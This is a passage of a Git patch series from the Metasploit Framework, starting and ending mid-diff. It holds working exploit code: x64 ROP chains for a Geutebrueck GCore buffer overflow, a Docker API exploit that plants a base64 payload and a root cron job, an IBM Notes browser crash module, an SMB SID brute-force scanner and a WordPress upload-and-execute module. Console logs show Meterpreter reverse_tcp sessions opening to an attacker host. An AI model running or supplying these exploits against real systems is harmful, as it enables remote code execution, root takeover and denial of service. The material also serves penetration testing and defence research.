[0x14029dc6e].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140cc2234 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140cc2234].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x1400ae2ae | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x1400ae2ae].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x1409AE1A8 is the .data section of gcore - rop += [0x1400aa030].pack('Q<') - rop += [0x1409AE1A8].pack('Q<') + # 0x14029dc6e: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x14029dc6e].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x140b5927a: xor rax, rax ; ret - rop += [0x140b5927a].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x1409AE1A8 is the .data section of gcore + rop += [0x1400aa030].pack('Q<') + rop += [0x1409AE1A8].pack('Q<') - # 0x1402ce220 pop rax ; ret - # 0x140d752b8 | VP Stub IAT Entry - rop += [0x1402ce220].pack('Q<') - rop += [0x140d752b8].pack('Q<') + # 0x140b5927a: xor rax, rax ; ret + rop += [0x140b5927a].pack('Q<') - # 0x1407c6b3b mov rax, qword [rax] ; ret ; - rop += [0x1407c6b3b].pack('Q<') + # 0x1402ce220 pop rax ; ret + # 0x140d752b8 | VP Stub IAT Entry + rop += [0x1402ce220].pack('Q<') + rop += [0x140d752b8].pack('Q<') - # 0x140989c41 push rax; ret - rop += [0x140989c41].pack('Q<') + # 0x1407c6b3b mov rax, qword [rax] ; ret ; + rop += [0x1407c6b3b].pack('Q<') - # 0x1406d684d jmp rsp - rop += [0x1406d684d].pack('Q<') + # 0x140989c41 push rax; ret + rop += [0x140989c41].pack('Q<') - [rop, overwrite, stack_align] + # 0x1406d684d jmp rsp + rop += [0x1406d684d].pack('Q<') - elsif target.name.include? '1.4.2.37' - print_status('Preparing ROP chain for target 1.4.2.37!') + [rop, overwrite, stack_align] - # 0x140cd9759 | add rsp, 0x10 ; ret - # This is needed because the next 16 bytes are sometimes messed up. - overwrite = [0x140cd9759].pack('Q<') + elsif target.name.include? '1.4.2.37' + print_status('Preparing ROP chain for target 1.4.2.37!') - # These bytes "\x43" are sacrificed ; we align the stack to jump over this. - stack_align = "\x43" * 16 + # 0x140cd9759 | add rsp, 0x10 ; ret + # This is needed because the next 16 bytes are sometimes messed up. + overwrite = [0x140cd9759].pack('Q<') - # We have 40 bytes left to align our stack! - # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations - # and to restore it. - # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. + # These bytes "\x43" are sacrificed ; we align the stack to jump over this. + stack_align = "\x43" * 16 - # 0x1404f213f: mov edx, esp ; ret - stack_align += [0x1404f213f].pack('Q<') + # We have 40 bytes left to align our stack! + # The most reliable way to align our stack is to save the value of rsp in another register, do some calculations + # and to restore it. + # We save RSP to RDX. Even if we use ESP/EDX registers in the instruction, it still works because the values are small enough. - # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. - # We pop -XXXXX as \xxxxxxxxx to rax - # 0x14000efa8 pop rax ; ret - stack_align += [0x14000efa8].pack('Q<') - stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') + # 0x1404f213f: mov edx, esp ; ret + stack_align += [0x1404f213f].pack('Q<') - # Our value is enough. - # 0x140cdfe65 | add rax,rdx ; ret - stack_align += [0x140cdfe65].pack('Q<') + # As no useful "sub rdx, xxx" or "sub rsp, xxx" gadget were found, we use the add instruction with a negative value. + # We pop -XXXXX as \xxxxxxxxx to rax + # 0x14000efa8 pop rax ; ret + stack_align += [0x14000efa8].pack('Q<') + stack_align += [0xFFFFFFFFFFFFF061].pack('Q<') - # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. - # 0x140cf3110 | mov rsp, rax ; ..... ; ret - stack_align += [0x140cf3110].pack('Q<') + # Our value is enough. + # 0x140cdfe65 | add rax,rdx ; ret + stack_align += [0x140cdfe65].pack('Q<') - # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. - # We want RCX to hold the value for VP Argument "Address of Shellcode" - # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; - rop = '' - rop += [0x140ccb984].pack('Q<') - rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; - # 0x14008f7ec | POP RDX; RETN - # 0x...1000 | Value for VP "Size of Memory" - rop += [0x14008f7ec].pack('Q<') - rop += [0x0000000000000400].pack('Q<') + # RSP gets restored with the new value. The return instruction doesn't break our ropchain and continues -XXXXX back. + # 0x140cf3110 | mov rsp, rax ; ..... ; ret + stack_align += [0x140cf3110].pack('Q<') - # 0x140a88f81: | POP R8; RET - # 0x...40 | Value for VP "Execute Permissions" - rop += [0x140a88f81].pack('Q<') - rop += [0x0000000000000040].pack('Q<') + # Virtualprotect Call for 64 Bit calling convention. Needs RCX, RDX, R8 and R9. + # We want RCX to hold the value for VP Argument "Address of Shellcode" + # 0x140ccb984 | mov rcx, rax ; mov rax, qword [rcx+0x00000108] ; add rsp, 0x28 ; ret ; + rop = '' + rop += [0x140ccb984].pack('Q<') + rop += [0x4141414141414141].pack('Q<') * 5 # needed because of the stack aliging with "add rsp, 0x28" ; + # 0x14008f7ec | POP RDX; RETN + # 0x...1000 | Value for VP "Size of Memory" + rop += [0x14008f7ec].pack('Q<') + rop += [0x0000000000000400].pack('Q<') - # 0x1400aa030 | POP R9; RET - # 0x... | Value for VP "Writeable location". Not sure if needed? - # 0x140FB5000 is the .data section of gcore; let's test with this writable section... - rop += [0x1400aa030].pack('Q<') - rop += [0x140FB5000].pack('Q<') + # 0x140a88f81: | POP R8; RET + # 0x...40 | Value for VP "Execute Permissions" + rop += [0x140a88f81].pack('Q<') + rop += [0x0000000000000040].pack('Q<') - # 0x140ccea2f: xor rax, rax ; et - rop += [0x140ccea2f].pack('Q<') + # 0x1400aa030 | POP R9; RET + # 0x... | Value for VP "Writeable location". Not sure if needed? + # 0x140FB5000 is the .data section of gcore; let's test with this writable section... + rop += [0x1400aa030].pack('Q<') + rop += [0x140FB5000].pack('Q<') - # 0x14000efa8 pop rax ; ret - # 0x140d83268 | VP Stub IAT Entry - rop += [0x14000efa8].pack('Q<') - rop += [0x140d83268].pack('Q<') + # 0x140ccea2f: xor rax, rax ; et + rop += [0x140ccea2f].pack('Q<') - # 0x14095b254 mov rax, qword [rax] ; ret ; - rop += [0x14095b254].pack('Q<') + # 0x14000efa8 pop rax ; ret + # 0x140d83268 | VP Stub IAT Entry + rop += [0x14000efa8].pack('Q<') + rop += [0x140d83268].pack('Q<') - # 0x140166c46 push rax; ret - rop += [0x140166c46].pack('Q<') + # 0x14095b254 mov rax, qword [rax] ; ret ; + rop += [0x14095b254].pack('Q<') - # 0x140cfb98d jmp rsp - rop += [0x140cfb98d].pack('Q<') + # 0x140166c46 push rax; ret + rop += [0x140166c46].pack('Q<') - [rop, overwrite, stack_align] + # 0x140cfb98d jmp rsp + rop += [0x140cfb98d].pack('Q<') - else - print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + [rop, overwrite, stack_align] - end - end + else + print_status('ROP chain for this version not (yet) available or the target is not vulnerable.') + + end + end + + def exploit + if target['auto'] + checkcode, self.target = fingerprint + fail_with(Failure::NotVulnerable, 'No vulnerable Version detected - exploit aborted.') if checkcode.to_s.include? 'unknown' + target_rop, target_overwrite, target_stack_align = ropchain(target) + else + print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') + print_status("Selected version: #{self.target.name}") + target_rop, target_overwrite, target_stack_align = ropchain(self.target) + end - def exploit - if target['auto'] - checkcode, target = fingerprint - if checkcode.to_s.include? 'unknown' - print_status('No vulnerable Version detected - exploit aborted.') - else - target_rop, target_overwrite, target_stack_align = ropchain(target) begin connect print_status('Crafting Exploit...') - http_req = 'GET /' buffer_200 = "\x41" * 200 rop = target_rop @@ -251,35 +259,5 @@ class MetasploitModule < Msf::Exploit::Remote disconnect end end - - else - print_status('No auto detection - be sure to choose the right version! Otherwise the service will crash, the system reboots and leaves the surveillance software in an undefined status.') - print_status("Selected version: #{self.target.name}") - target_rop, target_overwrite, target_stack_align = ropchain(self.target) - begin - connect - print_status('Crafting Exploit...') - - http_req = 'GET /' - buffer_200 = "\x41" * 200 - rop = target_rop - payload.encoded - buffer_1823 = "\x41" * 1823 - overwrite = target_overwrite - stack_align = target_stack_align - - exploit = http_req + buffer_200 + rop + payload.encoded + buffer_1823 + overwrite + stack_align - print_status('Exploit ready for sending...') - sock.put(exploit, 'Timeout' => 20) - print_status('Exploit sent!') - buf = sock.get_once || '' - rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e - elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") - ensure - print_status('Closing socket.') - disconnect - end - end end - end From b7184e87c075e29c3012a5c21119c8c58d5fad72 Mon Sep 17 00:00:00 2001 From: Maurice Popp Date: Sat, 7 Oct 2017 14:16:01 +0200 Subject: [PATCH 021/254] fixing a type --- modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb index 3e621f2858..e93adff0a2 100644 --- a/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb +++ b/modules/exploits/windows/http/geutebrueck_gcore_x64_rce_bo.rb @@ -260,4 +260,3 @@ class MetasploitModule < Msf::Exploit::Remote end end end - end From d8ff99b1f65e60c806f31a9ce6af01049a000f04 Mon Sep 17 00:00:00 2001 From: Martin Pizala Date: Sun, 8 Oct 2017 13:51:07 +0200 Subject: [PATCH 022/254] Change to ARCH_X64, remove python dependency --- .../exploit/linux/http/docker_daemon_tcp.md | 15 +++++----- .../exploits/linux/http/docker_daemon_tcp.rb | 30 +++++++------------ 2 files changed, 17 insertions(+), 28 deletions(-) diff --git a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md index 4c32e54a03..a76ab1ea28 100644 --- a/documentation/modules/exploit/linux/http/docker_daemon_tcp.md +++ b/documentation/modules/exploit/linux/http/docker_daemon_tcp.md @@ -88,8 +88,8 @@ to gain root access to the hosting server of the Docker container. msf > use exploit/linux/http/docker_daemon_tcp msf exploit(docker_daemon_tcp) > set RHOST 192.168.66.23 RHOST => 192.168.66.23 -msf exploit(docker_daemon_tcp) > set PAYLOAD python/meterpreter/reverse_tcp -PAYLOAD => python/meterpreter/reverse_tcp +msf exploit(docker_daemon_tcp) > set PAYLOAD linux/x64/meterpreter/reverse_tcp +PAYLOAD => linux/x64/meterpreter/reverse_tcp msf exploit(docker_daemon_tcp) > set LHOST 192.168.66.10 LHOST => 192.168.66.10 msf exploit(docker_daemon_tcp) > set VERBOSE true @@ -108,18 +108,17 @@ msf exploit(docker_daemon_tcp) > run [*] Waiting for the cron job to run, can take up to 60 seconds [*] Waiting until the docker container stopped [*] The docker container has been stopped, now trying to remove it -[*] Sending stage (40411 bytes) to 192.168.66.23 +[*] Sending stage (2878936 bytes) to 192.168.66.23 [*] Meterpreter session 1 opened (192.168.66.10:4444 -> 192.168.66.23:35050) at 2017-07-25 14:03:02 +0200 [+] Deleted /etc/cron.d/lVoepNpy [+] Deleted /tmp/poasDIuZ meterpreter > sysinfo -Computer : debian -OS : Linux 4.9.0-3-amd64 #1 SMP Debian 4.9.30-2+deb9u2 (2017-06-26) -Architecture : x64 -System Language : en_US -Meterpreter : python/linux +Computer : rancher +OS : Debian 9.1 (Linux 4.9.0-3-amd64) +Architecture : x64 +Meterpreter : x64/linux meterpreter > ``` diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index c733b2440c..069014ccdd 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -32,24 +32,17 @@ class MetasploitModule < Msf::Exploit::Remote ['URL', 'https://docs.docker.com/engine/reference/commandline/dockerd/#bind-docker-to-another-hostport-or-a-unix-socket'] ], 'DisclosureDate' => 'Jul 25, 2017', - 'Targets' => [ - [ 'Python', { - 'Platform' => 'python', - 'Arch' => ARCH_PYTHON, - 'Payload' => { - 'Compat' => { - 'ConnectionType' => 'reverse noconn none tunnel' - } - } - }] - ], - 'DefaultOptions' => { 'WfsDelay' => 180, 'Payload' => 'python/meterpreter/reverse_tcp' }, + 'Platform' => 'Linux', + 'Arch' => [ARCH_X64], + 'Payload' => { 'Space' => 65000 }, + 'Targets' => [[ 'Linux', {} ]], + 'DefaultOptions' => { 'WfsDelay' => 180 }, 'DefaultTarget' => 0)) register_options( [ Opt::RPORT(2375), - OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]), + OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'alpine:latest' ]), OptString.new('CONTAINER_ID', [ false, 'container id you would like']) ] ) @@ -88,13 +81,10 @@ class MetasploitModule < Msf::Exploit::Remote echo_cron_path = mnt_path + cron_path echo_payload_path = mnt_path + payload_path - cron_command = "python #{payload_path}" - payload_data = payload.raw - - command = "echo \"#{payload_data}\" >> #{echo_payload_path} && " - command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} && " - command << "echo \"\" >> #{echo_cron_path} && " - command << "echo \"* * * * * root #{cron_command}\" >> #{echo_cron_path}" + command = "echo #{Rex::Text.encode_base64(payload.encoded_exe)} | base64 -d > #{echo_payload_path} \&\& chmod +x #{echo_payload_path} \&\& " + command << "echo \"PATH=/sbin:/bin:/usr/sbin:/usr/bin:/usr/local/sbin:/usr/local/bin\" >> #{echo_cron_path} \&\& " + command << "echo \"\" >> #{echo_cron_path} \&\& " + command << "echo \"* * * * * root #{payload_path}\" >> #{echo_cron_path}" command end From 33ec3c3d690212494635b961889ea8a2e6711539 Mon Sep 17 00:00:00 2001 From: Martin Pizala Date: Sun, 8 Oct 2017 13:51:16 +0200 Subject: [PATCH 023/254] Error handling and style --- modules/exploits/linux/http/docker_daemon_tcp.rb | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index 069014ccdd..a9947c2811 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -54,7 +54,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'GET', 'uri' => normalize_uri('images', 'json') ) - return unless res and res.code == 200 and res.body.include? image_id + return unless res && res.code == 200 && res.body.include?(image_id) res end @@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote 'method' => 'POST', 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) ) - return unless res.code == 200 + return unless res && res.code == 200 res end @@ -125,7 +125,7 @@ class MetasploitModule < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - if res and res.code == 200 and res.headers['Server'].include? 'Docker' + if res && res.code == 200 && res.headers['Server'].include?('Docker') return Exploit::CheckCode::Vulnerable end @@ -181,7 +181,7 @@ class MetasploitModule < Msf::Exploit::Remote # delete container deleted_container = false - if res_wait.code == 200 + if res_wait && res_wait.code == 200 vprint_status("The docker container has been stopped, now trying to remove it") del_container(container_id) deleted_container = true From 3f6f70f8208390acbf6f14531ed73bc7f25db9ce Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Sun, 8 Oct 2017 13:58:51 -0400 Subject: [PATCH 024/254] Move the cve-2017-8464 source to external/source --- data/exploits/cve-2017-8464/src/build.sh | 17 ----------------- external/source/exploits/cve-2017-8464/build.sh | 17 +++++++++++++++++ .../source/exploits/cve-2017-8464}/template.c | 0 .../source/exploits/cve-2017-8464}/template.def | 0 .../source/exploits/cve-2017-8464}/template.h | 0 .../source/exploits/cve-2017-8464}/template.rc | 0 6 files changed, 17 insertions(+), 17 deletions(-) delete mode 100755 data/exploits/cve-2017-8464/src/build.sh create mode 100755 external/source/exploits/cve-2017-8464/build.sh rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.c (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.def (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.h (100%) rename {data/exploits/cve-2017-8464/src => external/source/exploits/cve-2017-8464}/template.rc (100%) diff --git a/data/exploits/cve-2017-8464/src/build.sh b/data/exploits/cve-2017-8464/src/build.sh deleted file mode 100755 index 202daa5413..0000000000 --- a/data/exploits/cve-2017-8464/src/build.sh +++ /dev/null @@ -1,17 +0,0 @@ -#!/bin/sh -rm -f *.o *.dll - -CCx86="i686-w64-mingw32" -CCx64="x86_64-w64-mingw32" - -${CCx64}-gcc -m64 -c -Os template.c -Wall -shared -${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll -${CCx64}-strip -s temp.dll -o ../template_x64_windows.dll -rm -f temp.dll *.o -chmod -x ../template_x64_windows.dll - -${CCx86}-gcc -c -Os template.c -Wall -shared -${CCx86}-dllwrap --def template.def *.o -o temp.dll -${CCx86}-strip -s temp.dll -o ../template_x86_windows.dll -rm -f temp.dll *.o -chmod -x ../template_x86_windows.dll diff --git a/external/source/exploits/cve-2017-8464/build.sh b/external/source/exploits/cve-2017-8464/build.sh new file mode 100755 index 0000000000..c5eb5e5211 --- /dev/null +++ b/external/source/exploits/cve-2017-8464/build.sh @@ -0,0 +1,17 @@ +#!/bin/sh +rm -f *.o *.dll + +CCx86="i686-w64-mingw32" +CCx64="x86_64-w64-mingw32" + +${CCx64}-gcc -m64 -c -Os template.c -Wall -shared +${CCx64}-dllwrap -m64 --def template.def *.o -o temp.dll +${CCx64}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x64_windows.dll + +${CCx86}-gcc -c -Os template.c -Wall -shared +${CCx86}-dllwrap --def template.def *.o -o temp.dll +${CCx86}-strip -s temp.dll -o ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll +rm -f temp.dll *.o +chmod -x ../../../../data/exploits/cve-2017-8464/template_x86_windows.dll diff --git a/data/exploits/cve-2017-8464/src/template.c b/external/source/exploits/cve-2017-8464/template.c similarity index 100% rename from data/exploits/cve-2017-8464/src/template.c rename to external/source/exploits/cve-2017-8464/template.c diff --git a/data/exploits/cve-2017-8464/src/template.def b/external/source/exploits/cve-2017-8464/template.def similarity index 100% rename from data/exploits/cve-2017-8464/src/template.def rename to external/source/exploits/cve-2017-8464/template.def diff --git a/data/exploits/cve-2017-8464/src/template.h b/external/source/exploits/cve-2017-8464/template.h similarity index 100% rename from data/exploits/cve-2017-8464/src/template.h rename to external/source/exploits/cve-2017-8464/template.h diff --git a/data/exploits/cve-2017-8464/src/template.rc b/external/source/exploits/cve-2017-8464/template.rc similarity index 100% rename from data/exploits/cve-2017-8464/src/template.rc rename to external/source/exploits/cve-2017-8464/template.rc From 6d28a579f304fdc551d5a3a53cd1612c4cb0a126 Mon Sep 17 00:00:00 2001 From: Martin Pizala Date: Mon, 9 Oct 2017 13:12:48 +0200 Subject: [PATCH 025/254] send_request_cgi instead of send_request_raw --- .../exploits/linux/http/docker_daemon_tcp.rb | 30 +++++++++++-------- 1 file changed, 18 insertions(+), 12 deletions(-) diff --git a/modules/exploits/linux/http/docker_daemon_tcp.rb b/modules/exploits/linux/http/docker_daemon_tcp.rb index a9947c2811..94b9787b48 100644 --- a/modules/exploits/linux/http/docker_daemon_tcp.rb +++ b/modules/exploits/linux/http/docker_daemon_tcp.rb @@ -50,9 +50,10 @@ class MetasploitModule < Msf::Exploit::Remote def check_image(image_id) vprint_status("Check if images exist on the target host") - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', - 'uri' => normalize_uri('images', 'json') + 'uri' => normalize_uri('images', 'json'), + 'ctype' => 'application/json' ) return unless res && res.code == 200 && res.body.include?(image_id) @@ -61,9 +62,10 @@ class MetasploitModule < Msf::Exploit::Remote def pull_image(image_id) print_status("Trying to pulling image from docker registry, this may take a while") - res = send_request_raw( + res = send_request_cgi( 'method' => 'POST', - 'uri' => normalize_uri('images', 'create?fromImage=' + image_id) + 'uri' => normalize_uri('images', 'create?fromImage=' + image_id), + 'ctype' => 'application/json' ) return unless res && res.code == 200 @@ -104,19 +106,21 @@ class MetasploitModule < Msf::Exploit::Remote end def del_container(container_id) - send_request_raw( + send_request_cgi( { 'method' => 'DELETE', - 'uri' => normalize_uri('containers', container_id) + 'uri' => normalize_uri('containers', container_id), + 'ctype' => 'application/json' }, 1 # timeout ) end def check - res = send_request_raw( + res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri('containers', 'json'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) @@ -151,10 +155,10 @@ class MetasploitModule < Msf::Exploit::Remote container_id = make_container_id # create container - res_create = send_request_raw( + res_create = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', 'create?name=' + container_id), - 'headers' => { 'Content-Type' => 'application/json' }, + 'ctype' => 'application/json', 'data' => make_container(mnt_path, cron_path, payload_path).to_json ) fail_with(Failure::Unknown, 'Failed to create the docker container') unless res_create && res_create.code == 201 @@ -163,19 +167,21 @@ class MetasploitModule < Msf::Exploit::Remote register_files_for_cleanup(cron_path, payload_path) # start container - send_request_raw( + send_request_cgi( { 'method' => 'POST', - 'uri' => normalize_uri('containers', container_id, 'start') + 'uri' => normalize_uri('containers', container_id, 'start'), + 'ctype' => 'application/json' }, 1 # timeout ) # wait until container stopped vprint_status("Waiting until the docker container stopped") - res_wait = send_request_raw( + res_wait = send_request_cgi( 'method' => 'POST', 'uri' => normalize_uri('containers', container_id, 'wait'), + 'ctype' => 'application/json', 'headers' => { 'Accept' => 'application/json' } ) From b83787c24c42bfe9a0d21f2ba0bc46bebe5bd6b5 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Mon, 9 Oct 2017 20:02:32 -0500 Subject: [PATCH 026/254] make powershell spec more specific in expectations --- spec/lib/msf/core/exploit/powershell_spec.rb | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/spec/lib/msf/core/exploit/powershell_spec.rb b/spec/lib/msf/core/exploit/powershell_spec.rb index 402ee98d67..fbe38decdf 100644 --- a/spec/lib/msf/core/exploit/powershell_spec.rb +++ b/spec/lib/msf/core/exploit/powershell_spec.rb @@ -276,11 +276,13 @@ RSpec.describe Msf::Exploit::Powershell do end it 'shouldnt shorten args' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -Command')).to be_truthy + expect(code.include?('-NoProfile ')).to be_truthy + expect(code.include?('-WindowStyle hidden')).to be_truthy + expect(code.include?('-Command ')).to be_truthy end it 'should include -NoExit' do code = subject.cmd_psh_payload(payload, arch) - expect(code.include?('-NoProfile -WindowStyle hidden -NoExit -Command')).to be_truthy + expect(code.include?('-NoExit ')).to be_truthy end end From 2b85eb17dd4c78c53aa34d8e92ee9b7a8b0e16c6 Mon Sep 17 00:00:00 2001 From: RootUp Date: Tue, 10 Oct 2017 12:22:06 +0530 Subject: [PATCH 027/254] Create ibm_lotus_notes2.rb --- .../auxiliary/dos/http/ibm_lotus_notes2.rb | 70 +++++++++++++++++++ 1 file changed, 70 insertions(+) create mode 100644 modules/auxiliary/dos/http/ibm_lotus_notes2.rb diff --git a/modules/auxiliary/dos/http/ibm_lotus_notes2.rb b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb new file mode 100644 index 0000000000..aabd3b5041 --- /dev/null +++ b/modules/auxiliary/dos/http/ibm_lotus_notes2.rb @@ -0,0 +1,70 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + include Msf::Exploit::Remote::HttpServer + + def initialize(info = {}) + super( + update_info( + info, + 'Name' => "IBM Notes encodeURI DOS", + 'Description' => %q( + This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. + If successful, the browser will crash after viewing the webpage. + ), + 'License' => MSF_LICENSE, + 'Author' => [ + 'Dhiraj Mishra', + ], + 'References' => [ + [ 'EXPLOIT-DB', '42604'], + [ 'CVE', '2017-1130' ] + ], + 'DisclosureDate' => 'August 31 2017', + 'Actions' => [[ 'WebServer' ]], + 'PassiveActions' => [ 'WebServer' ], + 'DefaultAction' => 'WebServer' + ) + ) + end + + def run + exploit # start http server + end + + def setup + @html = %| + + + + + | + end + + def on_request_uri(cli, _request) + print_status('Sending response') + send_response(cli, @html) + end +end From d715f5360452a9386bda39635fec186b1ad0e541 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Fri, 20 Oct 2017 15:32:25 -0500 Subject: [PATCH 028/254] add MinRID to complement MaxRID, allowing continuing or starting from a higher value from @lvarela-r7 --- modules/auxiliary/scanner/smb/smb_lookupsid.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 4d62a29ef2..05d8e86152 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -39,6 +39,7 @@ class MetasploitModule < Msf::Auxiliary register_options( [ + OptInt.new('MinRID', [ false, "Starting RID to check", 500 ]), OptInt.new('MaxRID', [ false, "Maximum RID to check", 4000 ]) ], self.class @@ -140,7 +141,6 @@ class MetasploitModule < Msf::Auxiliary # Fingerprint a single host def run_host(ip) - [[139, false], [445, true]].each do |info| @rport = info[0] @@ -227,8 +227,10 @@ class MetasploitModule < Msf::Auxiliary domain_sid || host_sid end + min_rid = datastore['MinRID'] # Brute force through a common RID range - 500.upto(datastore['MaxRID'].to_i) do |rid| + + min_rid.upto(datastore['MaxRID']) do |rid| stub = phandle + @@ -244,7 +246,6 @@ class MetasploitModule < Msf::Auxiliary NDR.long(1) + NDR.long(0) - dcerpc.call(15, stub) resp = dcerpc.last_response ? dcerpc.last_response.stub_data : nil @@ -295,6 +296,4 @@ class MetasploitModule < Msf::Auxiliary end end end - - end From cfd7761818ded3e388328037817ecc87e3cbe653 Mon Sep 17 00:00:00 2001 From: h00die Date: Fri, 20 Oct 2017 23:19:58 -0400 Subject: [PATCH 029/254] wp_mobile_detector rce --- .../wp_mobile_detector_upload_execute.md | 63 ++++++++++ .../wp_mobile_detector_upload_execute.rb | 118 ++++++++++++++++++ 2 files changed, 181 insertions(+) create mode 100644 documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md create mode 100644 modules/exploits/unix/webapp/wp_mobile_detector_upload_execute.rb diff --git a/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md new file mode 100644 index 0000000000..5443e074ee --- /dev/null +++ b/documentation/modules/exploit/unix/webapp/wp_mobile_detector_upload_execute.md @@ -0,0 +1,63 @@ +## Vulnerable Application + + wp-mobile-detector is a wordpress plugin which was removed from the wordpress site after this vulnerability + was disclosed. Version 3.5 and earlier can be directed to upload a file from a remote web server, and then + the file can be executed by the client. + + Download [wp-mobile-detector](https://www.exploit-db.com/apps/bf8bdbac0b01e14788aa2d4a0d9c6971-wp-mobile-detector.3.5.zip) + from Exploit-db since wordpress removed it. + + Due to its age, it may be difficult to install. The install for the scenario later is: + + * Ubuntu 16.04.2 + * Apache 2.4.18 + * PHP 7 + * Wordpress 4.4.2 + +## Verification Steps + + Example steps in this format (is also in the PR): + + 1. Install the application + 2. Start msfconsole + 3. Do: ```use exploit/unix/webapp/wp_mobile_detector_upload_execute``` + 4. Do: ```set rhost [ip]``` + 5. Do: ```set lhost [ip]``` + 6. Do: ```set srvhost [ip]``` + 7. Do: ```exploit``` + 8. You should get a shell. + +## Scenarios + +### wp-mobile-detector 3.5 on Wordpress 4.4.2 + + ``` + msf > use exploit/unix/webapp/wp_mobile_detector_upload_execute + msf exploit(wp_mobile_detector_upload_execute) > set rhost 2.2.2.2 + rhost => 2.2.2.2 + msf exploit(wp_mobile_detector_upload_execute) > set TARGETURI /wordpress/ + TARGETURI => /wordpress/ + msf exploit(wp_mobile_detector_upload_execute) > check + [*] 2.2.2.2:80 The target appears to be vulnerable. + msf exploit(wp_mobile_detector_upload_execute) > set payload php/meterpreter/reverse_tcp + payload => php/meterpreter/reverse_tcp + smsf exploit(wp_mobile_detector_upload_execute) > set lhost 1.1.1.1 + lhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > set srvhost 1.1.1.1 + srvhost => 1.1.1.1 + msf exploit(wp_mobile_detector_upload_execute) > exploit + [*] Exploit running as background job 2. + + [*] Started reverse TCP handler on 1.1.1.1:4444 + msf exploit(wp_mobile_detector_upload_execute) > [*] Starting Payload Server + [*] Using URL: 